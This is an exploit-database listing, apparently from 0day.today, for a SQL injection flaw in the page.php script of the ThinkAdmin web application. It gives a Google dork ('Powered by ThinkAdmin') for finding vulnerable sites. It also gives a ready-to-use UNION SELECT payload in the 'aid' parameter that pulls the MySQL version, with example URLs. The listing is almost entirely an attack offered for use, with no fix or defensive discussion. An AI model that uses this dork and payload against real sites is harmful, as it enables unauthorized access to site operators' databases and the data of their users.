ThinkAdmin (page.php) Sql Injection Vulnerability

2010-01-30T00:00:00
ID 1337DAY-ID-10737
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2010-01-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================
ThinkAdmin (page.php) Sql Injection Vulnerability
=================================================

.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin

===[ Exploit ]===
 
www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3
 
www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3
 
===[ Example ]===
 
http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3



#  0day.today [2018-02-06]  #